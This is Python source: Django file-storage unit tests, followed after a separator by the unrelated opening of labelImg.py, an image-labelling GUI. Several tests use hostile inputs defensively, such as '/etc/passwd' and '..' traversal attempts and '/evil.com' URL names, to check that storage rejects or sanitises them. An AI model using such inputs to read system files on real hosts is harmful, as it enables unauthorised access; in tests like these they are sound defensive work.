self.storage.delete('storage_test')
self.assertFalse(self.storage.exists('storage_test'))
def _test_file_time_getter(self, getter):
# Check for correct behavior under both USE_TZ=True and USE_TZ=False.
# The tests are similar since they both set up a situation where the
# system time zone, Django's TIME_ZONE, and UTC are distinct.
self._test_file_time_getter_tz_handling_on(getter)
self._test_file_time_getter_tz_handling_off(getter)
@override_settings(USE_TZ=True, TIME_ZONE='Africa/Algiers')
def _test_file_time_getter_tz_handling_on(self, getter):
# Django's TZ (and hence the system TZ) is set to Africa/Algiers which
# is UTC+1 and has no DST change. We can set the Django TZ to something
# else so that UTC, Django's TIME_ZONE, and the system timezone are all
# different.
now_in_algiers = timezone.make_aware(datetime.now())
with timezone.override(timezone.get_fixed_timezone(-300)):
# At this point the system TZ is +1 and the Django TZ
# is -5. The following will be aware in UTC.
now = timezone.now()
self.assertFalse(self.storage.exists('test.file.tz.on'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file.tz.on', f)
self.addCleanup(self.storage.delete, f_name)
dt = getter(f_name)
# dt should be aware, in UTC
self.assertTrue(timezone.is_aware(dt))
self.assertEqual(now.tzname(), dt.tzname())
# The three timezones are indeed distinct.
naive_now = datetime.now()
algiers_offset = now_in_algiers.tzinfo.utcoffset(naive_now)
django_offset = timezone.get_current_timezone().utcoffset(naive_now)
utc_offset = timezone.utc.utcoffset(naive_now)
self.assertGreater(algiers_offset, utc_offset)
self.assertLess(django_offset, utc_offset)
# dt and now should be the same effective time.
self.assertLess(abs(dt - now), timedelta(seconds=2))
@override_settings(USE_TZ=False, TIME_ZONE='Africa/Algiers')
def _test_file_time_getter_tz_handling_off(self, getter):
# Django's TZ (and hence the system TZ) is set to Africa/Algiers which
# is UTC+1 and has no DST change. We can set the Django TZ to something
# else so that UTC, Django's TIME_ZONE, and the system timezone are all
# different.
now_in_algiers = timezone.make_aware(datetime.now())
with timezone.override(timezone.get_fixed_timezone(-300)):
# At this point the system TZ is +1 and the Django TZ
# is -5.
self.assertFalse(self.storage.exists('test.file.tz.off'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file.tz.off', f)
self.addCleanup(self.storage.delete, f_name)
dt = getter(f_name)
# dt should be naive, in system (+1) TZ
self.assertTrue(timezone.is_naive(dt))
# The three timezones are indeed distinct.
naive_now = datetime.now()
algiers_offset = now_in_algiers.tzinfo.utcoffset(naive_now)
django_offset = timezone.get_current_timezone().utcoffset(naive_now)
utc_offset = timezone.utc.utcoffset(naive_now)
self.assertGreater(algiers_offset, utc_offset)
self.assertLess(django_offset, utc_offset)
# dt and naive_now should be the same effective time.
self.assertLess(abs(dt - naive_now), timedelta(seconds=2))
# If we convert dt to an aware object using the Algiers
# timezone then it should be the same effective time to
# now_in_algiers.
_dt = timezone.make_aware(dt, now_in_algiers.tzinfo)
self.assertLess(abs(_dt - now_in_algiers), timedelta(seconds=2))
def test_file_get_accessed_time(self):
"""
File storage returns a Datetime object for the last accessed time of
a file.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
self.addCleanup(self.storage.delete, f_name)
atime = self.storage.get_accessed_time(f_name)
self.assertEqual(atime, datetime.fromtimestamp(os.path.getatime(self.storage.path(f_name))))
self.assertLess(timezone.now() - self.storage.get_accessed_time(f_name), timedelta(seconds=2))
@requires_tz_support
def test_file_get_accessed_time_timezone(self):
self._test_file_time_getter(self.storage.get_accessed_time)
def test_file_get_created_time(self):
"""
File storage returns a datetime for the creation time of a file.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
self.addCleanup(self.storage.delete, f_name)
ctime = self.storage.get_created_time(f_name)
self.assertEqual(ctime, datetime.fromtimestamp(os.path.getctime(self.storage.path(f_name))))
self.assertLess(timezone.now() - self.storage.get_created_time(f_name), timedelta(seconds=2))
@requires_tz_support
def test_file_get_created_time_timezone(self):
self._test_file_time_getter(self.storage.get_created_time)
def test_file_get_modified_time(self):
"""
File storage returns a datetime for the last modified time of a file.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
self.addCleanup(self.storage.delete, f_name)
mtime = self.storage.get_modified_time(f_name)
self.assertEqual(mtime, datetime.fromtimestamp(os.path.getmtime(self.storage.path(f_name))))
self.assertLess(timezone.now() - self.storage.get_modified_time(f_name), timedelta(seconds=2))
@requires_tz_support
def test_file_get_modified_time_timezone(self):
self._test_file_time_getter(self.storage.get_modified_time)
def test_file_save_without_name(self):
"""
File storage extracts the filename from the content object if no
name is given explicitly.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f.name = 'test.file'
storage_f_name = self.storage.save(None, f)
self.assertEqual(storage_f_name, f.name)
self.assertTrue(os.path.exists(os.path.join(self.temp_dir, f.name)))
self.storage.delete(storage_f_name)
def test_file_save_with_path(self):
"""
Saving a pathname should create intermediate directories as necessary.
"""
self.assertFalse(self.storage.exists('path/to'))
self.storage.save('path/to/test.file', ContentFile('file saved with path'))
self.assertTrue(self.storage.exists('path/to'))
with self.storage.open('path/to/test.file') as f:
self.assertEqual(f.read(), b'file saved with path')
self.assertTrue(os.path.exists(
os.path.join(self.temp_dir, 'path', 'to', 'test.file')))
self.storage.delete('path/to/test.file')
def test_save_doesnt_close(self):
with TemporaryUploadedFile('test', 'text/plain', 1, 'utf8') as file:
file.write(b'1')
file.seek(0)
self.assertFalse(file.closed)
self.storage.save('path/to/test.file', file)
self.assertFalse(file.closed)
self.assertFalse(file.file.closed)
file = InMemoryUploadedFile(StringIO('1'), '', 'test', 'text/plain', 1, 'utf8')
with file:
self.assertFalse(file.closed)
self.storage.save('path/to/test.file', file)
self.assertFalse(file.closed)
self.assertFalse(file.file.closed)
def test_file_path(self):
"""
File storage returns the full path of a file
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
self.assertEqual(self.storage.path(f_name), os.path.join(self.temp_dir, f_name))
self.storage.delete(f_name)
def test_file_url(self):
"""
File storage returns a url to access a given file from the Web.
"""
self.assertEqual(self.storage.url('test.file'), self.storage.base_url + 'test.file')
# should encode special chars except ~!*()'
# like encodeURIComponent() JavaScript function do
self.assertEqual(
self.storage.url(r"~!*()'@#$%^&*abc`+ =.file"),
"/test_media_url/~!*()'%40%23%24%25%5E%26*abc%60%2B%20%3D.file"
)
self.assertEqual(self.storage.url("ab\0c"), "/test_media_url/ab%00c")
# should translate os path separator(s) to the url path separator
self.assertEqual(self.storage.url("""a/b\\c.file"""), "/test_media_url/a/b/c.file")
# #25905: remove leading slashes from file names to prevent unsafe url output
self.assertEqual(self.storage.url("/evil.com"), "/test_media_url/evil.com")
self.assertEqual(self.storage.url(r"\evil.com"), "/test_media_url/evil.com")
self.assertEqual(self.storage.url("///evil.com"), "/test_media_url/evil.com")
self.assertEqual(self.storage.url(r"\\\evil.com"), "/test_media_url/evil.com")
self.assertEqual(self.storage.url(None), "/test_media_url/")
def test_base_url(self):
"""
File storage returns a url even when its base_url is unset or modified.
"""
self.storage.base_url = None
with self.assertRaises(ValueError):
self.storage.url('test.file')
# #22717: missing ending slash in base_url should be auto-corrected
storage = self.storage_class(location=self.temp_dir, base_url='/no_ending_slash')
self.assertEqual(
storage.url('test.file'),
'%s%s' % (storage.base_url, 'test.file')
)
def test_listdir(self):
"""
File storage returns a tuple containing directories and files.
"""
self.assertFalse(self.storage.exists('storage_test_1'))
self.assertFalse(self.storage.exists('storage_test_2'))
self.assertFalse(self.storage.exists('storage_dir_1'))
self.storage.save('storage_test_1', ContentFile('custom content'))
self.storage.save('storage_test_2', ContentFile('custom content'))
os.mkdir(os.path.join(self.temp_dir, 'storage_dir_1'))
dirs, files = self.storage.listdir('')
self.assertEqual(set(dirs), {'storage_dir_1'})
self.assertEqual(set(files), {'storage_test_1', 'storage_test_2'})
self.storage.delete('storage_test_1')
self.storage.delete('storage_test_2')
os.rmdir(os.path.join(self.temp_dir, 'storage_dir_1'))
def test_file_storage_prevents_directory_traversal(self):
"""
File storage prevents directory traversal (files can only be accessed if
they're below the storage location).
"""
with self.assertRaises(SuspiciousFileOperation):
self.storage.exists('..')
with self.assertRaises(SuspiciousFileOperation):
self.storage.exists('/etc/passwd')
def test_file_storage_preserves_filename_case(self):
"""The storage backend should preserve case of filenames."""
# Create a storage backend associated with the mixed case name
# directory.
other_temp_storage = self.storage_class(location=self.temp_dir2)
# Ask that storage backend to store a file with a mixed case filename.
mixed_case = 'CaSe_SeNsItIvE'
file = other_temp_storage.open(mixed_case, 'w')
file.write('storage contents')
file.close()
self.assertEqual(os.path.join(self.temp_dir2, mixed_case), other_temp_storage.path(mixed_case))
other_temp_storage.delete(mixed_case)
def test_makedirs_race_handling(self):
"""
File storage should be robust against directory creation race conditions.
"""
real_makedirs = os.makedirs
# Monkey-patch os.makedirs, to simulate a normal call, a raced call,
# and an error.
def fake_makedirs(path):
if path == os.path.join(self.temp_dir, 'normal'):
real_makedirs(path)
elif path == os.path.join(self.temp_dir, 'raced'):
real_makedirs(path)
raise FileNotFoundError()
elif path == os.path.join(self.temp_dir, 'error'):
raise FileExistsError()
else:
self.fail('unexpected argument %r' % path)
try:
os.makedirs = fake_makedirs
self.storage.save('normal/test.file', ContentFile('saved normally'))
with self.storage.open('normal/test.file') as f:
self.assertEqual(f.read(), b'saved normally')
self.storage.save('raced/test.file', ContentFile('saved with race'))
with self.storage.open('raced/test.file') as f:
self.assertEqual(f.read(), b'saved with race')
# Exceptions aside from FileNotFoundError are raised.
with self.assertRaises(FileExistsError):
self.storage.save('error/test.file', ContentFile('not saved'))
finally:
os.makedirs = real_makedirs
def test_remove_race_handling(self):
"""
File storage should be robust against file removal race conditions.
"""
real_remove = os.remove
# Monkey-patch os.remove, to simulate a normal call, a raced call,
# and an error.
def fake_remove(path):
if path == os.path.join(self.temp_dir, 'normal.file'):
real_remove(path)
elif path == os.path.join(self.temp_dir, 'raced.file'):
real_remove(path)
raise FileNotFoundError()
elif path == os.path.join(self.temp_dir, 'error.file'):
raise PermissionError()
else:
self.fail('unexpected argument %r' % path)
try:
os.remove = fake_remove
self.storage.save('normal.file', ContentFile('delete normally'))
self.storage.delete('normal.file')
self.assertFalse(self.storage.exists('normal.file'))
self.storage.save('raced.file', ContentFile('delete with race'))
self.storage.delete('raced.file')
self.assertFalse(self.storage.exists('normal.file'))
# Exceptions aside from FileNotFoundError are raised.
self.storage.save('error.file', ContentFile('delete with error'))
with self.assertRaises(PermissionError):
self.storage.delete('error.file')
finally:
os.remove = real_remove
def test_file_chunks_error(self):
"""
Test behavior when file.chunks() is raising an error
"""
f1 = ContentFile('chunks fails')
def failing_chunks():
raise IOError
f1.chunks = failing_chunks
with self.assertRaises(IOError):
self.storage.save('error.file', f1)
def test_delete_no_name(self):
"""
Calling delete with an empty name should not try to remove the base
storage directory, but fail loudly (#20660).
"""
with self.assertRaises(AssertionError):
self.storage.delete('')
def test_delete_deletes_directories(self):
tmp_dir = tempfile.mkdtemp(dir=self.storage.location)
self.storage.delete(tmp_dir)
self.assertFalse(os.path.exists(tmp_dir))
@override_settings(
MEDIA_ROOT='media_root',
MEDIA_URL='media_url/',
FILE_UPLOAD_PERMISSIONS=0o777,
FILE_UPLOAD_DIRECTORY_PERMISSIONS=0o777,
)
def test_setting_changed(self):
"""
Properties using settings values as defaults should be updated on
referenced settings change while specified values should be unchanged.
"""
storage = self.storage_class(
location='explicit_location',
base_url='explicit_base_url/',
file_permissions_mode=0o666,
directory_permissions_mode=0o666,
)
defaults_storage = self.storage_class()
settings = {
'MEDIA_ROOT': 'overriden_media_root',
'MEDIA_URL': 'overriden_media_url/',
'FILE_UPLOAD_PERMISSIONS': 0o333,
'FILE_UPLOAD_DIRECTORY_PERMISSIONS': 0o333,
}
with self.settings(**settings):
self.assertEqual(storage.base_location, 'explicit_location')
self.assertIn('explicit_location', storage.location)
self.assertEqual(storage.base_url, 'explicit_base_url/')
self.assertEqual(storage.file_permissions_mode, 0o666)
self.assertEqual(storage.directory_permissions_mode, 0o666)
self.assertEqual(defaults_storage.base_location, settings['MEDIA_ROOT'])
self.assertIn(settings['MEDIA_ROOT'], defaults_storage.location)
self.assertEqual(defaults_storage.base_url, settings['MEDIA_URL'])
self.assertEqual(defaults_storage.file_permissions_mode, settings['FILE_UPLOAD_PERMISSIONS'])
self.assertEqual(
defaults_storage.directory_permissions_mode, settings['FILE_UPLOAD_DIRECTORY_PERMISSIONS']
)
class CustomStorage(FileSystemStorage):
def get_available_name(self, name, max_length=None):
"""
Append numbers to duplicate files rather than underscores, like Trac.
"""
parts = name.split('.')
basename, ext = parts[0], parts[1:]
number = 2
while self.exists(name):
name = '.'.join([basename, str(number)] + ext)
number += 1
return name
class CustomStorageTests(FileStorageTests):
storage_class = CustomStorage
def test_custom_get_available_name(self):
first = self.storage.save('custom_storage', ContentFile('custom contents'))
self.assertEqual(first, 'custom_storage')
second = self.storage.save('custom_storage', ContentFile('more contents'))
self.assertEqual(second, 'custom_storage.2')
self.storage.delete(first)
self.storage.delete(second)
class DiscardingFalseContentStorage(FileSystemStorage):
def _save(self, name, content):
if content:
return super()._save(name, content)
return ''
class DiscardingFalseContentStorageTests(FileStorageTests):
storage_class = DiscardingFalseContentStorage
def test_custom_storage_discarding_empty_content(self):
"""
When Storage.save() wraps a file-like object in File, it should include
the name argument so that bool(file) evaluates to True (#26495).
"""
output = StringIO('content')
self.storage.save('tests/stringio', output)
self.assertTrue(self.storage.exists('tests/stringio'))
with self.storage.open('tests/stringio') as f:
self.assertEqual(f.read(), b'content')
class FileFieldStorageTests(TestCase):
def tearDown(self):
shutil.rmtree(temp_storage_location)
def _storage_max_filename_length(self, storage):
"""
Query filesystem for maximum filename length (e.g. AUFS has 242).
"""
dir_to_test = storage.location
while not os.path.exists(dir_to_test):
dir_to_test = os.path.dirname(dir_to_test)
try:
return os.pathconf(dir_to_test, 'PC_NAME_MAX')
except Exception:
return 255 # Should be safe on most backends
def test_files(self):
self.assertIsInstance(Storage.normal, FileDescriptor)
# An object without a file has limited functionality.
obj1 = Storage()
self.assertEqual(obj1.normal.name, "")
with self.assertRaises(ValueError):
obj1.normal.size
# Saving a file enables full functionality.
obj1.normal.save("django_test.txt", ContentFile("content"))
self.assertEqual(obj1.normal.name, "tests/django_test.txt")
self.assertEqual(obj1.normal.size, 7)
self.assertEqual(obj1.normal.read(), b"content")
obj1.normal.close()
# File objects can be assigned to FileField attributes, but shouldn't
# get committed until the model it's attached to is saved.
obj1.normal = SimpleUploadedFile("assignment.txt", b"content")
dirs, files = temp_storage.listdir("tests")
self.assertEqual(dirs, [])
self.assertNotIn("assignment.txt", files)
obj1.save()
dirs, files = temp_storage.listdir("tests")
self.assertEqual(sorted(files), ["assignment.txt", "django_test.txt"])
# Save another file with the same name.
obj2 = Storage()
obj2.normal.save("django_test.txt", ContentFile("more content"))
obj2_name = obj2.normal.name
self.assertRegex(obj2_name, "tests/django_test_%s.txt" % FILE_SUFFIX_REGEX)
self.assertEqual(obj2.normal.size, 12)
obj2.normal.close()
# Deleting an object does not delete the file it uses.
obj2.delete()
obj2.normal.save("django_test.txt", ContentFile("more content"))
self.assertNotEqual(obj2_name, obj2.normal.name)
self.assertRegex(obj2.normal.name, "tests/django_test_%s.txt" % FILE_SUFFIX_REGEX)
obj2.normal.close()
def test_filefield_read(self):
# Files can be read in a little at a time, if necessary.
obj = Storage.objects.create(
normal=SimpleUploadedFile("assignment.txt", b"content"))
obj.normal.open()
self.assertEqual(obj.normal.read(3), b"con")
self.assertEqual(obj.normal.read(), b"tent")
self.assertEqual(list(obj.normal.chunks(chunk_size=2)), [b"co", b"nt", b"en", b"t"])
obj.normal.close()
def test_filefield_write(self):
# Files can be written to.
obj = Storage.objects.create(normal=SimpleUploadedFile('rewritten.txt', b'content'))
with obj.normal as normal:
normal.open('wb')
normal.write(b'updated')
obj.refresh_from_db()
self.assertEqual(obj.normal.read(), b'updated')
obj.normal.close()
def test_filefield_reopen(self):
obj = Storage.objects.create(normal=SimpleUploadedFile('reopen.txt', b'content'))
with obj.normal as normal:
normal.open()
obj.normal.open()
obj.normal.file.seek(0)
obj.normal.close()
def test_duplicate_filename(self):
# Multiple files with the same name get _(7 random chars) appended to them.
objs = [Storage() for i in range(2)]
for o in objs:
o.normal.save("multiple_files.txt", ContentFile("Same Content"))
try:
names = [o.normal.name for o in objs]
self.assertEqual(names[0], "tests/multiple_files.txt")
self.assertRegex(names[1], "tests/multiple_files_%s.txt" % FILE_SUFFIX_REGEX)
finally:
for o in objs:
o.delete()
def test_file_truncation(self):
# Given the max_length is limited, when multiple files get uploaded
# under the same name, then the filename get truncated in order to fit
# in _(7 random chars). When most of the max_length is taken by
# dirname + extension and there are not enough characters in the
# filename to truncate, an exception should be raised.
objs = [Storage() for i in range(2)]
filename = 'filename.ext'
for o in objs:
o.limited_length.save(filename, ContentFile('Same Content'))
try:
# Testing truncation.
names = [o.limited_length.name for o in objs]
self.assertEqual(names[0], 'tests/%s' % filename)
self.assertRegex(names[1], 'tests/fi_%s.ext' % FILE_SUFFIX_REGEX)
# Testing exception is raised when filename is too short to truncate.
filename = 'short.longext'
objs[0].limited_length.save(filename, ContentFile('Same Content'))
with self.assertRaisesMessage(SuspiciousFileOperation, 'Storage can not find an available filename'):
objs[1].limited_length.save(*(filename, ContentFile('Same Content')))
finally:
for o in objs:
o.delete()
@unittest.skipIf(
sys.platform.startswith('win'),
"Windows supports at most 260 characters in a path.",
)
def test_extended_length_storage(self):
# Testing FileField with max_length > 255. Most systems have filename
# length limitation of 255. Path takes extra chars.
filename = (self._storage_max_filename_length(temp_storage) - 4) * 'a' # 4 chars for extension.
obj = Storage()
obj.extended_length.save('%s.txt' % filename, ContentFile('Same Content'))
self.assertEqual(obj.extended_length.name, 'tests/%s.txt' % filename)
self.assertEqual(obj.extended_length.read(), b'Same Content')
obj.extended_length.close()
def test_filefield_default(self):
# Default values allow an object to access a single file.
temp_storage.save('tests/default.txt', ContentFile('default content'))
obj = Storage.objects.create()
self.assertEqual(obj.default.name, "tests/default.txt")
self.assertEqual(obj.default.read(), b"default content")
obj.default.close()
# But it shouldn't be deleted, even if there are no more objects using
# it.
obj.delete()
obj = Storage()
self.assertEqual(obj.default.read(), b"default content")
obj.default.close()
def test_empty_upload_to(self):
# upload_to can be empty, meaning it does not use subdirectory.
obj = Storage()
obj.empty.save('django_test.txt', ContentFile('more content'))
self.assertEqual(obj.empty.name, "django_test.txt")
self.assertEqual(obj.empty.read(), b"more content")
obj.empty.close()
def test_random_upload_to(self):
# Verify the fix for #5655, making sure the directory is only
# determined once.
obj = Storage()
obj.random.save("random_file", ContentFile("random content"))
self.assertTrue(obj.random.name.endswith("/random_file"))
obj.random.close()
def test_custom_valid_name_callable_upload_to(self):
"""
Storage.get_valid_name() should be called when upload_to is a callable.
"""
obj = Storage()
obj.custom_valid_name.save("random_file", ContentFile("random content"))
# CustomValidNameStorage.get_valid_name() appends '_valid' to the name
self.assertTrue(obj.custom_valid_name.name.endswith("/random_file_valid"))
obj.custom_valid_name.close()
def test_filefield_pickling(self):
# Push an object into the cache to make sure it pickles properly
obj = Storage()
obj.normal.save("django_test.txt", ContentFile("more content"))
obj.normal.close()
cache.set("obj", obj)
self.assertEqual(cache.get("obj").normal.name, "tests/django_test.txt")
def test_file_object(self):
# Create sample file
temp_storage.save('tests/example.txt', ContentFile('some content'))
# Load it as python file object
with open(temp_storage.path('tests/example.txt')) as file_obj:
# Save it using storage and read its content
temp_storage.save('tests/file_obj', file_obj)
self.assertTrue(temp_storage.exists('tests/file_obj'))
with temp_storage.open('tests/file_obj') as f:
self.assertEqual(f.read(), b'some content')
def test_stringio(self):
# Test passing StringIO instance as content argument to save
output = StringIO()
output.write('content')
output.seek(0)
# Save it and read written file
temp_storage.save('tests/stringio', output)
self.assertTrue(temp_storage.exists('tests/stringio'))
with temp_storage.open('tests/stringio') as f:
self.assertEqual(f.read(), b'content')
# Tests for a race condition on file saving (#4948).
# This is written in such a way that it'll always pass on platforms
# without threading.
class SlowFile(ContentFile):
def chunks(self):
time.sleep(1)
return super().chunks()
class FileSaveRaceConditionTest(SimpleTestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
self.thread = threading.Thread(target=self.save_file, args=['conflict'])
def tearDown(self):
shutil.rmtree(self.storage_dir)
def save_file(self, name):
name = self.storage.save(name, SlowFile(b"Data"))
def test_race_condition(self):
self.thread.start()
self.save_file('conflict')
self.thread.join()
files = sorted(os.listdir(self.storage_dir))
self.assertEqual(files[0], 'conflict')
self.assertRegex(files[1], 'conflict_%s' % FILE_SUFFIX_REGEX)
@unittest.skipIf(sys.platform.startswith('win'), "Windows only partially supports umasks and chmod.")
class FileStoragePermissions(unittest.TestCase):
def setUp(self):
self.umask = 0o027
self.old_umask = os.umask(self.umask)
self.storage_dir = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.storage_dir)
os.umask(self.old_umask)
@override_settings(FILE_UPLOAD_PERMISSIONS=0o654)
def test_file_upload_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
name = self.storage.save("the_file", ContentFile("data"))
actual_mode = os.stat(self.storage.path(name))[0] & 0o777
self.assertEqual(actual_mode, 0o654)
@override_settings(FILE_UPLOAD_PERMISSIONS=None)
def test_file_upload_default_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
fname = self.storage.save("some_file", ContentFile("data"))
mode = os.stat(self.storage.path(fname))[0] & 0o777
self.assertEqual(mode, 0o666 & ~self.umask)
@override_settings(FILE_UPLOAD_DIRECTORY_PERMISSIONS=0o765)
def test_file_upload_directory_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
name = self.storage.save("the_directory/the_file", ContentFile("data"))
dir_mode = os.stat(os.path.dirname(self.storage.path(name)))[0] & 0o777
self.assertEqual(dir_mode, 0o765)
@override_settings(FILE_UPLOAD_DIRECTORY_PERMISSIONS=None)
def test_file_upload_directory_default_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
name = self.storage.save("the_directory/the_file", ContentFile("data"))
dir_mode = os.stat(os.path.dirname(self.storage.path(name)))[0] & 0o777
self.assertEqual(dir_mode, 0o777 & ~self.umask)
class FileStoragePathParsing(SimpleTestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
def tearDown(self):
shutil.rmtree(self.storage_dir)
def test_directory_with_dot(self):
"""Regression test for #9610.
If the directory name contains a dot and the file name doesn't, make
sure we still mangle the file name instead of the directory name.
"""
self.storage.save('dotted.path/test', ContentFile("1"))
self.storage.save('dotted.path/test', ContentFile("2"))
files = sorted(os.listdir(os.path.join(self.storage_dir, 'dotted.path')))
self.assertFalse(os.path.exists(os.path.join(self.storage_dir, 'dotted_.path')))
self.assertEqual(files[0], 'test')
self.assertRegex(files[1], 'test_%s' % FILE_SUFFIX_REGEX)
def test_first_character_dot(self):
"""
File names with a dot as their first character don't have an extension,
and the underscore should get added to the end.
"""
self.storage.save('dotted.path/.test', ContentFile("1"))
self.storage.save('dotted.path/.test', ContentFile("2"))
files = sorted(os.listdir(os.path.join(self.storage_dir, 'dotted.path')))
self.assertFalse(os.path.exists(os.path.join(self.storage_dir, 'dotted_.path')))
self.assertEqual(files[0], '.test')
self.assertRegex(files[1], '.test_%s' % FILE_SUFFIX_REGEX)
class ContentFileStorageTestCase(unittest.TestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
def tearDown(self):
shutil.rmtree(self.storage_dir)
def test_content_saving(self):
"""
ContentFile can be saved correctly with the filesystem storage,
if it was initialized with either bytes or unicode content.
"""
self.storage.save('bytes.txt', ContentFile(b"content"))
self.storage.save('unicode.txt', ContentFile("español"))
@override_settings(ROOT_URLCONF='file_storage.urls')
class FileLikeObjectTestCase(LiveServerTestCase):
"""
Test file-like objects (#15644).
"""
available_apps = []
def setUp(self):
self.temp_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(location=self.temp_dir)
def tearDown(self):
shutil.rmtree(self.temp_dir)
def test_urllib2_urlopen(self):
"""
Test the File storage API with a file like object coming from urllib2.urlopen()
"""
file_like_object = urlopen(self.live_server_url + '/')
f = File(file_like_object)
stored_filename = self.storage.save("remote_file.html", f)
remote_file = urlopen(self.live_server_url + '/')
with self.storage.open(stored_filename) as stored_file:
self.assertEqual(stored_file.read(), remote_file.read())
|
labelImg.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import codecs
import distutils.spawn
import os
import platform
import re
import sys
import subprocess
import threading
from functools import partial
from collections import defaultdict
try:
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
except ImportError:
# needed for py3+qt4
# Ref:
# http://pyqt.sourceforge.net/Docs/PyQt4/incompatible_apis.html
# http://stackoverflow.com/questions/21217399/pyqt4-qtcore-qvariant-object-instead-of-a-string
if sys.version_info.major >= 3:
import sip
sip.setapi('QVariant', 2)
from PyQt4.QtGui import *
from PyQt4.QtCore import *
import resources
# Add internal libs
from libs.constants import *
from libs.lib import struct, newAction, newIcon, addActions, fmtShortcut, generateColorByText
from libs.settings import Settings
from libs.shape import Shape, DEFAULT_LINE_COLOR, DEFAULT_FILL_COLOR
from libs.canvas import Canvas
from libs.zoomWidget import ZoomWidget
from libs.labelDialog import LabelDialog
from libs.colorDialog import ColorDialog
from libs.labelFile import LabelFile, LabelFileError
from libs.toolBar import ToolBar
from libs.pascal_voc_io import PascalVocReader
from libs.pascal_voc_io import XML_EXT
from libs.yolo_io import YoloReader
from libs.yolo_io import TXT_EXT
from libs.ustr import ustr
from libs.version import __version__
tensor_flow_is_present=True
try:
import new_predictor
except ModuleNotFoundError:
tensor_flow_is_present=False
import json
__appname__ = 'labelImg'
#tensor_flow_is_present = False
# Utility functions and classes.
def have_qstring():
'''p3/qt5 get rid of QString wrapper as py3 has native unicode str type'''
return not (sys.version_info.major >= 3 or QT_VERSION_STR.startswith('5.'))
def util_qt_strlistclass():
return QStringList if have_qstring() else list
class WindowMixin(object):
if (sys.platform == 'linux'):
if(not os.path.exists(os.environ['HOME']+'/Документы/labelImg')):
os.mkdir(os.environ['HOME']+'/Документы/labelImg')
os.mkdir(os.environ['HOME']+'/Документы/labelImg/Images')
os.mkdir(os.environ['HOME']+'/Документы/labelImg/Results')
yolo_img_path = os.environ['HOME']+'/Документы/labelImg/Images'
yolo_res_path = os.environ['HOME']+'/Документы/labelImg/Results'
elif (sys.platform == 'win32' or sys.platform == 'win64'):
if(not os.path.exists(os.environ['HOMEPATH']+'/Documents/labelImg')):
os.mkdir(os.environ['HOMEPATH']+'/Documents/labelImg')
os.mkdir(os.environ['HOMEPATH']+'/Documents/labelImg/Images')
os.mkdir(os.environ['HOMEPATH']+'/Documents/labelImg/Results')
yolo_img_path = os.environ['HOMEPATH']+'/Documents/labelImg/Images'
yolo_res_path = os.environ['HOMEPATH']+'/Documents/labelImg/Results'
else:
yolo_img_path = 'Not stated'
yolo_res_path = 'Not stated'
yolo_config_path = os.path.abspath(os.curdir) + '/weights-configs/config_for_predict_nissan.json'
yolo_weights_path = os.path.abspath(os.curdir) + '/weights-configs/full_yolo_mobilenet_dock.h5-2.hdf5'
yolo_thres = 0.1
def menu(self, title, actions=None):
menu = self.menuBar().addMenu(title)
if actions:
addActions(menu, actions)
return menu
def toolbar(self, title, actions=None):
toolbar = ToolBar(title)
toolbar.setObjectName(u'%sToolBar' % title)
# toolbar.setOrientation(Qt.Vertical)
toolbar.setToolButtonStyle(Qt.ToolButtonTextUnderIcon)
if actions:
addActions(toolbar, actions)
self.addToolBar(Qt.LeftToolBarArea, toolbar)
return toolbar
# PyQt5: TypeError: unhashable type: 'QListWidgetItem'
class HashableQListWidgetItem(QListWidgetItem):
def __init__(self, *args):
super(HashableQListWidgetItem, self).__init__(*args)
def __hash__(self):
return hash(id(self))
class ProgressBar(QMainWindow):
stop_progress=False
def __init__(self):
super().__init__()
self.initUI()
def initUI(self):
self.pbar = QProgressBar(self)
self.pbar.setGeometry(30, 40, 200, 25)
self.btn = QPushButton('Cancel', self)
self.btn.move(40, 80)
self.btn.clicked.connect(self.cancel)
self.timer = QBasicTimer()
self.step = 0
self.setGeometry(300, 300, 280, 170)
self.setWindowTitle("Progress")
def cancel(self):
self.stop_progress=True
self.close()
def setProgress(self, progress):
self.pbar.setValue(progress)
if(progress >=100):
self.close()
class MainWindow(QMainWindow, WindowMixin):
FIT_WINDOW, FIT_WIDTH, MANUAL_ZOOM = list(range(3))
def __init__(self, defaultFilename=None, defaultPrefdefClassFile=None, defaultSaveDir=None):
super(MainWindow, self).__init__()
self.setWindowTitle(__appname__)
self.errorWin = None
# Load setting in the main thread
self.settings = Settings()
self.settings.load()
settings = self.settings
# Save as Pascal voc xml
self.defaultSaveDir = defaultSaveDir
self.usingPascalVocFormat = True
self.usingYoloFormat = False
# For loading all image under a directory
self.mImgList = []
self.dirname = None
self.labelHist = []
self.yoloConfList = [self.yolo_img_path, self.yolo_res_path,self.yolo_config_path, self.yolo_weights_path, self.yolo_thres]
self.lastOpenDir = None
# Whether we need to save or not.
self.dirty = False
self._noSelectionSlot = False
self._beginner = True
self.screencastViewer = self.getAvailableScreencastViewer()
self.screencast = "https://youtu.be/p0nR2YsCY_U"
# Load predefined classes to the list
self.loadPredefinedClasses(defaultPrefdefClassFile)
# Main widgets and related state.
self.labelDialog = LabelDialog(parent=self, listItem=self.labelHist)
self.itemsToShapes = {}
self.shapesToItems = {}
self.prevLabelText = ''
listLayout = QVBoxLayout()
listLayout.setContentsMargins(0, 0, 0, 0)
